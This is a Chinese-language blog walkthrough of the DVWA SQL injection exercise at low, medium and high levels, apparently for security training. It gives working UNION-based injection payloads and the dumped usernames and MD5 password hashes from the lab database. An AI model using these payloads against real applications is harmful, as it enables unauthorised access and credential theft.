您的位置:首页 > 数据库

DVWA - SQL Injection (low, medium, high)

2017-01-06 16:50 525 查看

low

查看源码,可发现是注入点id为字符类型,无验证,直接上:

' union select first_name,password from users#


返回结果如下:

ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99


medium

查看源码,发现代码用mysqli_real_escape_string来转义特殊字符,但是此时的注入点id为数值型,不需要用’。修改html源码提交:

<option value="0 union select first_name,password from users">1</option>


返回结果如下:

ID: 0 union select first_name,password from users
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: 0 union select first_name,password from users
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: 0 union select first_name,password from users
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 0 union select first_name,password from users
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 0 union select first_name,password from users
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99


high

查看源码,可发现注入点id为字符型,查询记录限1,其实方法和low差不多

' union select first_name,password from users#


返回结果如下:

ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  security
相关文章推荐
新的分享
章节导航